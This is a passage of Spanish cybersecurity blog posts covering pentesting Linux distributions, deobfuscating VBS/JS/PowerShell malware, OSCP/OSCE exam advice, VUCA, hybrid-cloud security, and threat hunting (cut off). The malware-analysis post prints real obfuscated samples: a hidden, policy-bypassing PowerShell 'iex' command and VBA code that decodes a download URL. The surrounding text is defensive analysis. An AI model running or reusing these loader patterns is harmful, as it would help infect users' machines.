Linux con accesos a Metasploit, Armitage y Burpsuite] Kali Linux es la distribución de Linux más conocida para realizar hacking ético y pruebas pentesting. Kali Linux fue desarrollado por Offensive Security tomando el manto de BackTrack. Kali Linux está basado en Debian. Viene con una gran cantidad de herramientas de prueba de penetración de diversos campos de seguridad y análisis forense. Y ahora sigue el modelo de Rolling Release, lo que significa que todas las herramientas de su colección siempre estarán actualizadas. Es la plataforma de pruebas de penetración más avanzada que existe. Es compatible con una amplia gama de dispositivos y plataformas de hardware. Además, Kali Linux proporciona documentación decente y una comunidad grande y activa. Puedes descargar Kali Linux en todas sus variantes : Aquí ### BackBox [Imagen: Escritorio de BackBox Linux con el logotipo azul y accesos directos del sistema] BackBox es una distribución basada en Ubuntu desarrollada para fines de evaluación de seguridad y pruebas de penetración. Es una de las mejores distribuciones en su campo. BackBox tiene su propio repositorio de software que proporciona las últimas versiones estables de varios kits de herramientas de análisis de redes y sistemas y las mejores herramientas de Hacking Ético conocidas. Está diseñado teniendo en cuenta el minimalismo y utiliza el entorno de escritorio XFCE. Ofrece una experiencia rápida, efectiva, personalizable y completa con una comunidad muy útil detrás de la misma. Puedes descargar BackBox : Aquí ### Parrot Security OS [Imagen: Menú de Parrot Security OS desplegado sobre un fondo con una figura con máscara de gas] Parrot Security OS es relativamente nuevo en el juego. Frozenbox Network está detrás del desarrollo de esta distribución. Los usuarios finales de Parrot Security OS son probadores Pentesters que necesitan un entorno amigable con cloud con anonimato y sistema cifrado. Parrot Security OS también se basa en Debian y usa MATE como su entorno de escritorio. Casi todas las herramientas reconocidas para Hacking Ético están disponibles en la misma, junto con algunas herramientas personalizadas exclusivas de Frozenbox Network. Y sí, al igual que pasa con Kali Linux, está disponible en modo Rolling Release. Puedes descargar Parrot Security : Aquí ### ArchStrike [Imagen: Fondo de escritorio de ArchStrike con la máscara de Anonymous y la palabra HOPE] ArchStrike (anteriormente conocido como ArchAssault) es un proyecto basado en Arch Linux para Pentesters y profesionales de ciberseguridad. Viene con lo mejor de Arch Linux más herramientas adicionales para pruebas de penetración y ciberseguridad. ArchStrike incluye miles de herramientas y aplicaciones, todas categorizadas en grupos de paquetes modulares. Puedes descargar ArchStrike : Aquí ### BlackArch [Imagen: Menú de BlackArch con la herramienta hdmi-sniff seleccionada junto a una consola de Metasploit] BlackArch es una distribución de investigación de seguridad y pruebas de penetración construida sobre Arch Linux. BlackArch tiene su propio repositorio que contiene miles de herramientas organizadas en varios grupos., la cual va creciendo con el tiempo. Si eres un usuario de Arch Linux, puede configurar la colección de herramientas BlackArch sobre él. Puedes descargar BlackArch : Aquí ### Bugtraq [Imagen: Menú de Bugtraq-II mostrando herramientas de análisis de puertos como Nmap y Hping3] Bugtraq es una distribución de Linux con una amplia gama de herramientas de laboratorio, forenses y de penetración. Bugtraq está disponible con entornos de escritorio XFCE, GNOME y KDE basados en Ubuntu, Debian y OpenSUSE y disponible en 11 idiomas diferentes. Bugtraq incluye un enorme arsenal de herramientas Pentesting: Análisis forense móvil, laboratorios de pruebas de malware y herramientas específicamente diseñadas por la comunidad de Bugtraq. Puedes descargar Bugtraq : Aquí ### DEFT Linux [ DESCONTINUADA ] [Imagen: Menú de DEFT Linux con herramientas OSINT como BurpSuite y DirBuster para forense] DEFT, abreviatura de Digital Evidence & Forensics Toolkit, Linux es una distribución hecha para Análisis Forense, con el propósito de ejecutar un sistema en vivo sin dañar ni manipular los dispositivos conectados a la PC donde se realiza el arranque. DEFT está emparejado con DART (Digital Advanced Response Toolkit), un sistema de Análisis Forense para Windows. Utiliza el entorno de escritorio LXDE y WINE para ejecutar herramientas de Windows. Puedes descargar DEFT : Aquí ## Samurai Web Testing Framework [Imagen: Escritorio de Samurai Web Testing Framework con el buscador KDE abierto para captura de pantalla] Samurai Web Testing Framework se ha desarrollado con el único propósito de realizar pruebas de penetración en web. Otra diferencia es que viene como una máquina virtual, compatible con Virtualbox y VMWare. Samurai Web Testing Framework se basa en Ubuntu y contiene las mejores herramientas gratuitas y de código abierto que se centran en probar y atacar sitios web. Incluye una configuración de Wiki preconfigurada para almacenar información durante las propias pruebas pentest. Puedes descargar Samurai Web Testing Framework : Aquí ## Pentoo Linux [Imagen: Menú de Pentoo Linux con la herramienta Nemesis seleccionada en la categoría Forging] Pentoo está basado en Gentoo Linux. Es una distribución enfocada en las pruebas de seguridad y penetración, disponible como LiveCD con soporte de persistencia (Esto significa que cualquier cambio realizado en el entorno de Live estará disponible en el próximo arranque si usas una memoria USB). Pentoo es básicamente una instalación de Gentoo con muchas herramientas personalizadas, características de kernel y mucho más, en un entorno de escritorio XFCE. Si ya eres usuario de Gentoo, puedes instalar Pentoo como una superposición del mismo. Puedes descargar Pentoo : Aquí ## Caine [Imagen: Escritorio de CAINE Linux con una terminal y el menú de herramientas forenses de memoria] CAINE esta dispuesto para Entornos de Investigación Asistido por Ordenador. Creado como un proyecto de Análisis Forense, está completamente enfocado en él. Caine viene con una amplia variedad de herramientas desarrolladas para el análisis forense del sistema. Puedes descargar Caine : Aquí ### Fedora Security Spin [Imagen: Menú de Fedora Security Spin mostrando herramientas forenses como ddrescue y Foremost] Fedora Security Spin es una variación de Fedora diseñada para auditorías y pruebas de seguridad la cual también se puede utilizar para fines de enseñanza. El propósito de esta distribución es apoyar a los estudiantes y profesores mientras practican o aprenden metodologías de ciberseguridad, seguridad en aplicaciones web, análisis forense, etc. Puedes descargar Fedora Security Spin : Aquí ## Network Security Toolkit [Imagen: Captura de EtherApe mostrando un gráfico radial del tráfico de red por protocolos] Network Security Toolkit es una Live ISO de arranque basado en Fedora. Proporciona a los profesionales de la seguridad y a los administradores de red una amplia gama de herramientas de seguridad de red de código abierto. Network Security Toolkit tiene una interfaz de usuario web avanzada para la administración de sistemas / redes, navegación, automatización, monitorización y análisis de redes así como multiples configuraciones de muchas aplicaciones que se encuentran en la distribución. Puedes descargar Network Security Toolkit : Aquí Son muchas las distribuciones disponible, y cada cual tiene sus manias respecto a las mismas. Si usas cualquier otra y es de esas , que sin ella no podrias trabajar. No dudes en comentarnos cual es. --- # Analizando malware que utilice Visual Basic Script, Javascript y/o Powershell URL: https://ciberseguridad.blog/analizando-malware-que-utilice-visual-basic-script-javascript-y-o-powershell/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2019-04-12 Actualizado: 2026-10-04 Tema: Vulnerabilidades y Ataques Informaticos > ¿Que hace un malware que utilice Visual Basic Script, JS y/o Powrshell? Método no infalible, pero podremos utilizarlo en Athenea CCNI , visto en RootedCON. Hola a tod@s Vamos a ver como de forma rápida tratar de ver qué hace un malware que utilice Visual Basic Script, Javascript y/o Powrshell. Este método no es infalible, se puede escapar alguno, pero la idea es ver algunos ejemplos sencillos y los complicados, te los dejo a ti xD. Utilizaré una utilidad que programé para de forma sencilla, copias el código malicioso, pegas en la herramienta y ves la salida. Si la quereis, pordeis descargarla aquí: DESCARGA Comenzamos con una muestra en Powershell. Busco uno en Google: Por ejemplo Si vamos a los procesos, podemos ver el comando completo de Powershell que utiliza. [Imagen: Proceso powershell.exe visto en el monitor de procesos con código ofuscado y PID 3700] powershell.exe -noP -exec Bypass -nonI -c "&{$o4='fedgolsvfindstr'; $m2o='powershell -wi"N "hid"Den -c {'+$o4.SubString($o4.length - 7, 7)+' /s mrekikaso c:\users\*.lnk}'; $re=iex "$m2o"; "$re"|iex}" En negrita vemos el código que tenemos que copiar y pegar en la herramienta. [Imagen: Cadena de ejecución de mshta.exe lanzando powershell.exe con descarga desde static-jquery.com] Pulsamos en nuevo o “File – New”, pegamos el contenido (o arrastramos el fichero a la herramienta), seleccionamos el check de Powershell, pulsamos en “Replace mal function” y pulsamos en Play. El resultado es el comando de la ejecución. Probemos otro ejemplo, este mismo. [Imagen: Herramienta de Rafa decodificando un comando PowerShell ofuscado del archivo malwareexample.ps1] Como sé lo que estais pensando, os contesto a esos pensamentos. La herramienta no es mágica, no sirve para todo, depende del nivel de ofuscación del script. La herramienta reemplaza funciones, por lo que si no está, no puede reemplazar, a veces hay que ayudarle. En este caso: [Imagen: Herramienta de Rafa con variables de entorno resaltadas en el script malwareexample3.ps1] Reemplazamos manualmente esas variables por IEX: [Imagen: Herramienta de Rafa analizando una cadena IEX ofuscada del script malwareexample3.ps1] Y ejecutamos. [Imagen: Herramienta de Rafa revelando la descarga desde static-jquery.com en malwareexample3.ps1] Vemos el resultado final. Hay que tener cuidado con ejecutarlo directamente porque puedes infectarte. Pasamos al Visual Basic Script. La idea es la misma en los 3 casos. Inicialmente la idea surgió debido a que me encontraba mucho malware con código similar a este. Por ejemplo: Dim url_array() As Variant url_array = Array(161, 173, 173, 169, 115, 104, 104, 107, 106, 111, 103, 106, 110, 113, 103, 113, 107, 103, 106, 109, 114, 104, 105, 114, 174, 113, 161, 112, 111, 159, 104, 111, 110, 159, 160, 111, 112, 167) Dim count As Integer Dim url As String url = "" For count = LBound(url_array) To UBound(url_array) url = url & Chr(url_array(count) - 20 - 37) Next count Y necesitaba algo que de manera rápida, con un copiar y pegar me generara el resultado de la URL. Esto es Visual Basic for Applications, por lo que hay que tocar “un poquito” el código para poderlo ejecutar en la herramienta. [Imagen: Herramienta de Rafa decodificando código VBS que genera la URL 216.158.82.149] Quitándole el tipo de las variables y eliminando count en el Next, funciona todo. La alternativa manual a esto sería. Abre un fichero de texto, guardalo como VBS, pega el código, transformalo para que funcione, guardalo, abre una consola, ejecuta el comando y espera que todo funcione para ver la salida esperada. Son muchos pasos. Con la herramienta, sólo 1. Si utilizáis Notepad++, por ejemplo, podéis ver como colorea el código y comprobar si lo estáis hacendo bien, una vez finalizado, lo pegais en la herramienta que hará el resto. Finalizamos con los ficheros Javascript: Aqui. [Imagen: Código Javascript ofuscado con eval y decodeURIComponent generado por Javascript Obfuscator] Aquí tenemos 2 opciones, reemplazar las funciones automáticamente (check “Replace mal function”) o introduciendo la función a reemplazar en el combobox. Seleccionamos eval y pulsamos enter. Una vez comprobemos que ha reemplazado la función eval por la correspondiente (según el checkbox que esté marcado, vbs, js o ps1) que mostraría el resultado por la consola, pulsamos el Play. Vemos el resultado final: [Imagen: Herramienta de Rafa decodificando el script ofuscado Facture-orange-316454579541.js] Necesitamos que este contenido pase a la ventana de arriba para poder seguir analizando. Pulsamos el botón que está justo a la izquierda del Play. [Imagen: Detalle de los iconos de copiar, exportar y ejecutar en la herramienta de Rafa] Y repetimos el proceso (bien seleccionando la función eval en el combo y pulsando Enter o bien marcando el check de “Replace mal function”). Esta vez marcaremos el check, por hacerlo de manera diferente a la anterior. Después de esperar los 16 segundos iniciales (Sleep 16000), vemos como ha cambiado la ventana de abajo. [Imagen: Captura de la herramienta de Rafa desglosando un payload JavaScript ofuscado en hexadecimal] Lo mismo, lo pasamos arriba y Play. Y ya tenemos el código javascript sin ofuscar: [Imagen: Deobfuscación del script mostrando variables WScript.Shell y claves de registro de Windows] [Imagen: Código deobfuscado revelando conexión POST a total-virus.myq-see.com y comprobación de antivirus] Como veis, es muy útil con pocos clicks llegar al resultado final, de forma manual se tarda mucho tiempo y la idea era tener una herramienta que me permita de manera rápida analizar VBS, JS y PS1, un todo en uno. Espero que os haya gustado, la verdad es que Mariano ( Ponencia Rooted ) me animó a escribir este POST después de la gran charla que dio en la Rootedcon 2019 (os la recomiendo, no tiene desperdicio) y habló de la herramienta que programó un compañero suyo, pues aquí la tenéis para el que la quiera usar. Saludos a todos!! --- # Consejos para sacar el OSCP y OSCE URL: https://ciberseguridad.blog/consejos-para-sacar-el-oscp-y-osce/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2019-03-26 Actualizado: 2026-10-08 Tema: Curso y Master en Ciberseguridad > Hola a tod@s!! Un amigo que quiere sacarse las certificaciones de OSCP y OSCE me pidió que por qué no publicaba unos consejos como ayuda para estas certificaciones. ¿Y por qué no? Antes de empezar, si queréis saber de qué van estas certificaciones, podeis verlo en la página oficial: * OSCP [https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/] (Offensive Security Certified Professional) * OSCE [https://www.offensive Hola a tod@s!! Un amigo que quiere sacarse las certificaciones de OSCP y OSCE me pidió que por qué no publicaba unos consejos como ayuda para estas certificaciones. ¿Y por qué no? Antes de empezar, si queréis saber de qué van estas certificaciones, podeis verlo en la página oficial: - OSCP (Offensive Security Certified Professional) - OSCE (Offensive Security Certified Expert) Como resumen os diré que son 2 certificaciones muy demandadas profesionalmente debido a que son técnicas y prácticas. El examen, como os podéis imaginar, es práctico, nada de tipo test. Y no son sencillos, tienes que haber practicado mucho, mucho y algo más. La documentación (PDF y videos) que te proporcionan es muy buena y suficiente. Deberás ampliar los conocimientos por tu cuenta en algunos casos, ten en cuenta que querrás hacer cosas como las harías ahora y no como cuando fue diseñada la certificación, a eso me refiero con que tendrás que ampliar... ## Offensive Security Certified Professional Voy con el primero, el OSCP. Tienes un laboratorio con más de 50 máquinas (varios sistemas operativos). Cada una se resuelve de una (o varias) manera(s) diferente(s) y lo que te encuentres en una máquina te puede servir para otra (ojo con esto, puede que la solución la tengas delante y no te des cuenta). Hay varias redes que tendrás que ir descubriendo. Cada máquina tiene un flag que hay que conseguir, gracias a él, se te abrirán otras puertas (o redes más bien). Hay varias formas de conseguir el acceso a las máquinas, con exploits (exploit-db) tal cual, modificados, etc. Aprovechando alguna vulnerabilidad en aplicaciones web, en protocolos, etc. Generalmente hay más de una forma. Mi consejo es dedicarle todo el tiempo que puedas al laboratorio, ya que el examen será parecido a lo que ves en él. Tuve la suerte de dedicarle varias horas por la tarde, después del trabajo, y conseguí hacer todas las máquinas. Cuanto más practiques mejor se te dará. En un mes y medio, a unas 3-4 horas diarias, te podría dar tiempo, eso depende de cada uno (recomendable los 3 meses de laboratorio, hay ampliaciones si necesitas más tiempo). Tienes un foro, en el cual está prohibido dar la solución, pero sí que te puede dar alguna pista, aunque a veces, es confuso. Documenta cada máquina, lo necesitarás para el futuro y sobre todo, enumera, enumera y vuelve a enumerar. Mira en todos los puertos, en modo fast, se te pasará alguna cosa. Sin duda, es una certificación recomendable y con la que mejor me lo he pasado. Se aprende mucho y se recuerda más, incluso descubrí alguna vulnerabilidad saliéndome del guión. Hay gente que dice que el laboratorio es antiguo y no merece la pena, desde mi punto de vista, todo lo contrario (antiguo sí, pero merece la pena), siempre se aprende y no puedes parar hasta que lo terminas, estás tan metido en él, que el tiempo se te pasa volando. Resumen: Enumera, documenta, prueba todo lo que se te ocurra, equivocate para hacerlo mejor y suerte en el examen. [Imagen: Logotipo de Offensive Security para la certificación OSCP con fondo marrón] ## Offensive Security Certified Expert El OSCE es otra cosa, tienes pruebas de hacking (al estilo OSCP) y exploiting más avanzado que la anterior certificación. El material (PDF y videos) son imprescindibles. Viene muy bien verse todos los videos, te ayudarán en muchos casos a saber cómo lo hacen ellos. Deberás ampliar el laboratorio (el mío fue de 1 mes, recomendable 2 meses), cuando digo ampliar, me refiero a buscar más binarios con vulnerabilidades o explotables de alguna forma (diferentes técnicas) y practicar con ellos. Son muy útiles los tutoriales de Corelan y Fuzzy Security . También lo es vulnserver, para exploits remotos. Tendrás que entender y manejar los shellcodes para los exploits como si fuese tu día a día. Dedícale tiempo. Prueba diferentes tipos, análizalos, entiende el porqué funcionan en una máquina sí y en otra no. Dedícale tiempo al PDF, reprodúcelo en el lab y si no te da tiempo en casa, los binarios los tendrás una vez que accedas al lab. Personalmente, disfruté más con el OSCP, este ha sido un poco más duro y con menos tiempo para practicar. Ánimo y suerte, seguro que lo conseguís, con esfuerzo, ganas y tiempo, todo es posible!!! [Imagen: Logotipo de Offensive Security para la certificación OSCE sobre fondo verde] --- # VUCA: La realidad en ciberseguridad URL: https://ciberseguridad.blog/vuca-la-realidad-en-ciberseguridad/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2019-03-24 Actualizado: 2026-10-08 Tema: Noticias Seguridad > Conoce que es y por qué dónde mejor encaja este acrónimo de VUCA es en ciberseguridad. ¡ DISFRUTALO ! Hay un nombre para el ambiente en el que viven los militares y partes de las fuerzas de seguridad/ciberseguridad. Se llama VUCA. - Volatilidad - Incertidumbre - Complejidad - Ambigüedad Desde hace un par de años, la noción de "VUCA" está ganando popularidad (Más bien parece que si no hablas de VUCA estas obsoleto) como término para cubrir las diversas dimensiones de este entorno "incontrolable" aplicado a cualquier modelo de negocios, pero lo cierto es que, donde mejor encaja este nuevo acronimo, es en ciberseguridad. Piensa en cómo ha evolucionado la guerra, ha pasado de líneas de batalla definidas con adversarios que llevan uniformes claramente identificables al campo de batalla urbano de hoy, donde el personal hostil esta incrustado entre los amistosos y son casi imposibles de diferenciar hasta que actúan. Los mismos tipos de desafíos existen para los cuerpos del estado y las empresas privadas cuando tratan de identificar a aquellos dentro y fuera de nuestras fronteras cuando ejecutan planes ciberterroristas y ciberataques. Todos los responsables de la protección de los activos de la organización viven también en un entorno de VUCA. Si vemos VUCA en detalle, para entender mejor cómo describe los retos a los que nos enfrentamos en materia de ciberseguridad, podemos ver: ## Volatilidad (Volatility) La volatilidad se define como algo "susceptible de cambiar de forma muy repentina o extrema". Es fácil ver cómo existe en ciberseguridad en un entorno volátil. Cada día, la superficie de ataque que manejamos cambia. Surgen nuevas vulnerabilidades, a menudo sin avisos o sin parches. Los sistemas que antes eran seguros se ven comprometidos y se utilizan como puntos para lanzar ataques. Y todos los días, los usuarios interactúan con estafas de phishing en su correo electrónico, son víctimas de sitios web peligrosos y están diseñados socialmente para obtener tus credenciales. Claramente, en ciberseguridad vivimos en un ambiente volátil. ## Incertidumbre (Uncertainty) La certeza es escurridiza. La mayoría de los gerentes TI reconocen que operan con datos imperfectos. Saber exactamente qué sistemas están en una red es un gran desafío. Comprender el estado de estos activos es igualmente difícil, especialmente con la movilidad de los usuarios y la creciente lista de servicios, herramientas y tecnologías que se están desplegando en la mayoría de las empresas. Y al otro lado de la ecuación, no sabes con certeza quiénes son los malos. No sabes con certeza las herramientas que utilizan, o los conocimientos que tienen. Puedes tratar de aplicar inteligencia de amenazas a esto, pero en última instancia nunca es suficiente. El problema es demasiado volátil para tener certeza sobre cualquier cosa, aparte de la certeza de que hay amenazas que debemos manejar. ## Complejidad (Complexity) Este es obvio. Cada dispositivo, servicio y aplicación que implementamos trae consigo nuevas complejidades. La configuración de las políticas es extremadamente difícil. El equilibrio entre "optimizado para la seguridad" y "optimizado para realizar el trabajo" se traduce en políticas debilitadas y nuevos riesgos que hay que gestionar. La complejidad apilada sobre la complejidad resulta en una superficie de ataque que es esencialmente desconocida. Y esto se aplica a todas las organizaciones, desde las más pequeñas hasta las más grandes. Las defensas de ciberseguridad traen su propia complejidad, y eso es significativo. Tener las habilidades dentro de la empresa para gestionar eficazmente las responsabilidades que conlleva la ciberseguridad se está convirtiendo cada vez más en algo inalcanzable para todos, excepto para los pocos afortunados que se encuentran en la cima de la pirámide. Ampliar esta capacidad y mantenerse al día con la complejidad es lo que más afecta a las pymes medianas. ## Ambigüedad Y finalmente, la ambigüedad. Eso es gris. No estoy seguro, podría ser, pero de nuevo, podría no serlo. Esta ha sido la perdición de la existencia del equipo de ciberseguridad. El despliegue de muchos productos y servicios en las puertas de enlace, en los endpoints y en cualquier lugar que se encuentre entre ellos genera un agotamiento interminable de los datos de registro y eventos/logs. ¿Qué haces con la información? ¿Cómo encuentras la verdadera amenaza? ¿Podemos confiar en que encontraremos una nueva amenaza en los datos de los logs? Probablemente no. ¿Cómo transformar una señal gris en un ciberdelincuente o en un evento inocente? ¿Qué otros datos o medidas necesitamos para recopilarlos?. Una anomalía es sólo eso hasta que podemos investigar el contexto de esa anomalía. Y para ello son necesarias herramientas y capacidades muy diferentes de las que normalmente se despliegan en una organización. La caza de amenazas requiere "armas" especializadas y una coordinación de esfuerzos en el equipo de ciberseguridad e IT. Debemos demostrar nuestras habilidades frente a otros enfoques, como por ejemplo, el SIEM. En ciberseguridad debemos odiar la ambigüedad. No podemos eliminarlo todo, pero debemos hacer un trabajo muy eficaz proporcionando a nuestros analistas de ciberseguridad suficiente contexto y herramientas para poder llegar a la respuesta de la forma más rápida. --- # Estrategias de ciberseguridad en Cloud Híbrida URL: https://ciberseguridad.blog/estrategias-de-ciberseguridad-en-cloud-hibrida/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2019-03-12 Actualizado: 2026-10-08 Tema: Operaciones de Seguridad > La cloud híbrida ofrece lo mejor de ambos mundos: la personalización y la flexibilidad del CPD [https://es.wikipedia.org/wiki/Centro_de_procesamiento_de_datos] con la conveniencia de la cloud pública [https://es.wikipedia.org/wiki/Nube_pública]. Esta adaptabilidad es lo que la hace atractiva para las empresas. Según Gartner, en 2020, el 90 por ciento de las organizaciones se habrán trasladado a una infraestructura de cloud híbrida. Las clouds híbridas son tan personalizables como sea necesari La cloud híbrida ofrece lo mejor de ambos mundos: la personalización y la flexibilidad del CPD con la conveniencia de la cloud pública. Esta adaptabilidad es lo que la hace atractiva para las empresas. Según Gartner, en 2020, el 90 por ciento de las organizaciones se habrán trasladado a una infraestructura de cloud híbrida. [Imagen: Comparativa gráfica entre cloud privado, híbrido y público con sus ventajas] Las clouds híbridas son tan personalizables como sea necesario, por lo que los requisitos de seguridad que necesita una organización también son variables. Por ejemplo, algunas empresas pueden optar por una interacción mínima con la parte del centro de datos de sus soluciones en cloud, mientras que otras pueden usarla para la mayoría de sus operaciones, utilizando solo la clouds pública para almacenar datos no esenciales. Cuando se trata de clouds híbridas, el personal de tecnología de la información debe saber exactamente qué tipo de configuración utiliza la organización y dónde se encuentran los datos, ya sea alojados en redes de cloud públicas o almacenados en CPDs. ## Amenazas en Cloud Con respecto a la cloud, es importante comprender que las amenazas a menudo no son específicas de cloud. Amenazas como ransomware, ataques de compromiso de correo electrónico o violaciones de datos pueden ocurrir tanto en entornos cloud como en entornos tradicionales. Las violaciones de datos pueden ocurrir debido a los archivos adjuntos de malware, o pueden ser el resultado de ataques man in the midle en cloud. Por lo tanto, las organizaciones deben implementar medidas de seguridad adecuadas para proteger sus redes y sistemas, independientemente del tipo de configuración que se usen. ## Asegurando la cloud híbrida como responsabilidad compartida No importa qué tipo de configuración empleen, la organización debe adherirse a un principio muy importante de seguridad cloud: la responsabilidad compartida. Las organizaciones a veces cometen el error de suponer que el proveedor de servicios manejará todos los aspectos de la seguridad cloud y que una vez que el servicio esté en funcionamiento, ya no tendrán ninguna necesidad de proteger su cloud. La verdad es que la seguridad en cloud es una responsabilidad compartida: Mientras que el proveedor de servicios ofrece seguridad para la infraestructura subyacente, la organización es responsable de proteger los datos en sí. Esto significa, además, implementar políticas de acceso, garantizar el cifrado adecuado y administrar la configuración general del servicio cloud para satisfacer las necesidades de la organización. Esto también se extiende a otros aspectos de seguridad, como actualizar y parchear máquinas dentro de la organización y monitorizar el software instalado en estas máquinas. La organización debe tener en cuenta todos sus requisitos al elegir un proveedor externo para el servicio cloud, no solo en términos de características, sino también en términos de seguridad y control de acceso. Según el servicio cloud utilizado, los proveedores de servicios también tendrán acceso a los datos de la organización, lo que puede no ser viable para algunas organizaciones. A pesar de la gran variación en las configuraciones de clouds híbridas, hay ciertos principios de seguridad que se aplican a todas las formas de cloud híbridas, que se pueden resumir en cuatro puntos: 1. La adhesión a un solo proceso, independientemente del entorno, la cloud hará que todo el sistema funcione de manera mucho más fluida. Los procesos mixtos tanto para cloud como para los entornos tradicionales no se combinan bien entre sí. La organización necesita crear un entorno que tenga en cuenta los requisitos tanto para cloud como para los sistemas tradicionales. Una infraestructura tradicional suele incluir aplicaciones y plataformas, así como procesos empresariales. La cloud híbrida puede integrarse en la infraestructura existente de una organización y proporcionar flexibilidad y escalabilidad. Por ejemplo, una organización puede retener sus cargas de trabajo críticas, como los datos, en sus CPDs tradicionales, mientras mueve las aplicaciones, correos electrónicos y la gestión de relaciones con los clientes (CRM) a la nube. 2. Las herramientas que se escalan automáticamente ayudarán a la organización a maximizar tanto su personal como sus recursos, permitiendo un mayor enfoque en las áreas centrales de operaciones. Esta es una de las principales ventajas de una cloud híbrida. La infraestructura local puede ser costosa de actualizar: hay costes de hardware, costes de mantenimiento e incluso costes de desarrollo e implementación de aplicaciones que pueden sumarse rápidamente a medida que las operaciones comienzan a escalar. Las cloud híbridas se pueden personalizar según las necesidades de una empresa sin tener que asumir los costes asociados con la ampliación de operaciones. 3. Las herramientas personalizables que son programables permitirán a las organizaciones adaptarlas de acuerdo con los requisitos específicos respectivos de las organizaciones. La mayoría de los proveedores de nube híbrida ofrecen una gama de opciones para organizaciones que pueden personalizarse para adaptarse a sus requisitos. 4. Las soluciones de seguridad implementadas tienen un grado de "toma de decisiones", es decir, son lo suficientemente inteligentes como para tomar decisiones de seguridad en nombre de las organizaciones. Al igual que el segundo punto, permite menos recursos humanos y recursos para maximizar la seguridad. Esto es especialmente importante para las organizaciones, dado que una gran parte de sus operaciones pueden estar alojadas en la cloud. Teniendo en cuenta la sofisticación de las amenazas modernas, puede que no sea suficiente para los proveedores de cloud híbrida ofrecer solo soluciones de seguridad rudimentarias con sus productos y servicios. La tecnología de seguridad también debe ser lo suficientemente inteligente como para adaptarse y aprender incluso sin intervención humana. ## Mejores prácticas para asegurar la cloud. Independientemente del tipo de estructura cloud que utilice una organización, estas mejores prácticas ayudarán a maximizar la seguridad cloud. ### Emplear el principio de mínimo privilegio. Todos los entornos cloud deben implementar el principio de mínimo privilegio, que establece que el acceso a partes específicas del sistema solo debe otorgarse a los usuarios que lo necesiten. ### Asegura todos los endpoint en la red. El uso de la infraestructura en la cloud no descarta la necesidad de una seguridad de end point más sólida. Muchos ataques comienzan a nivel end point, y esto no es diferente cuando se trata de sistemas basados ​​en cloud. En consecuencia, las organizaciones deben implementar la protección adecuada de end point, que incluye el uso de soluciones de seguridad integrales que brindan características como la protección de vulnerabilidades del navegador y la inclusión en la lista blanca de las aplicaciones, así como la capacitación adecuada de los usuarios sobre seguridad. ### Aislar la infraestructura más crítica. Para las organizaciones que almacenan datos importantes en cloud, la idea es que menos es más: cuanto menos personas tengan acceso a datos importantes, más seguros están de posibles ataques. ### Cifrar los datos que pasan a través de la nube. Esta es también una forma de aislar la infraestructura más crítica. Los datos, tanto en tránsito como en reposo, deben cifrarse como una medida de seguridad general. Muchos proveedores de servicios en la nube ya ofrecen el cifrado de datos como parte de sus medidas de seguridad, pero las organizaciones que desean profundizar su seguridad en la nube pueden buscar soluciones que incluyan el cifrado de datos. ### Copia de seguridad de datos críticos en dispositivos de almacenamiento externo. El uso de la infraestructura cloud no garantiza la seguridad de los datos de las organizaciones, ya que un ataque o falla del sistema puede significar una pérdida temporal o incluso permanente de los datos. Para un enfoque más integral de la seguridad, las organizaciones deben hacer una copia de seguridad de sus datos tanto física como virtualmente, ya que al hacerlo se asegura que los datos estén accesibles en todo momento. ### Crear un plan de continuidad de negocio y recuperación ante desastres. Las organizaciones deben tener un plan de respaldo que garantice que las operaciones se ejecutarán sin problemas en caso de emergencias, como la interrupción de los servicios o cortes de energía en los centros de datos. Esto incluye la implementación de copias de seguridad basadas en imágenes que pueden crear copias de máquinas virtuales (VM) que a su vez se pueden usar para restaurar o recuperar datos. ### Elegir la solución de seguridad cloud adecuada. Las organizaciones deben elegir la solución de seguridad cloud adecuada para sus organizaciones según lo que les brinde la mayor protección. Un entorno de nube híbrida requiere soluciones de seguridad híbridas. Las organizaciones pueden asegurar datos y aplicaciones críticas en cloud y entornos virtualizados con una protección eficaz del servidor que maximiza sus beneficios operativos y económicos. ## Conclusiones Para los líderes de ciberseguridad, es hora de optimizar las habilidades del equipo para los diferentes tipos de cloud. La seguridad de cloud pública, que abarca los entornos SaaS, PaaS e IaaS, es más sobre políticas, auditoría, análisis y habilidades de trabajo en equipo en lugar de pura profundidad técnica, e incluirá más habilidades de dominio cruzado que las requeridas en el más silo de la estructura en las instalaciones. Crear la combinación adecuada de habilidades para todos estos escenarios , ayudará a desarrollar la confianza a medida que construimos el modelo de cloud híbrida. --- # El complejo juego de las evidencias, comportamiento, y Threat Hunting URL: https://ciberseguridad.blog/el-complejo-juego-de-las-evidencias-comportamiento-y-threat-hunting/ Tipo: Artículo Autor: Mikel Gastesi Publicado: 2019-03-06 Actualizado: 2026-10-08 Tema: Operaciones de Seguridad > Desarrollando un entorno con puntos débiles realistas en seguridad para atraer a los ciberatacantes y engañarlos , somos más seguros. ! Conoce cómo ¡ La mayoría de los profesionales de la ciberseguridad coinciden a la hora de describir el panorama de amenazas actual: dinámico y en constante evolución. De toda la información que circula diariamente al respecto, gran parte es muy precisa, pero en ocasiones resulta especulativa. En muchos casos, los ciberataques se atribuyen a un grupo criminal por algunos indicadores de compromiso (IOC, por sus siglas en inglés), el tipo de herramientas utilizadas por los atacantes o su modus operandi (denominado aquí como MO). Sin embargo, la atribución es a menudo difícil de determinar. Vivimos en un mundo que está siempre conectado, que no duerme; siempre hay más y más que hacer, y necesitamos ser eficientes al máximo para cumplir con las demandas actuales. Esta es la razón por la que delegamos muchas veces en la automatización de tareas y procesos al permitirnos ahorrar en tiempo y costes. Sin embargo, algunas tareas requieren una atención al detalle que solo puede hacerse manualmente, y automatizarlas no resulta nada sencillo. Aunque cada atacante es único y cada ataque también puede ser único, tendemos a caer en la generalización de las evidencias. Hay, por supuesto, algunos fundamentos que pueden aplicarse para ayudarnos a estudiar a nuestros adversarios y en este artículo compartimos ideas sobre los conceptos básicos que desempeñan un papel clave en la lucha contra las amenazas actuales en el entorno digital. ## Punto de partida: indicadores de compromiso Comencemos con la parte más simple de la investigación de amenazas: los indicadores de compromiso o IOC. Los mismos se pueden dividir en tres categorías principales: - Infraestructura (IOC de red) - Herramientas (hashes, mutexes, reglas yara, etc.) - Humanos (uso específico de herramientas, comandos, etc.) Nuestros indicadores favoritos son las herramientas y los IOC basados ​​en comportamientos humanos. Por lo general, para un adversario resulta bastante económico echar abajo una infraestructura y 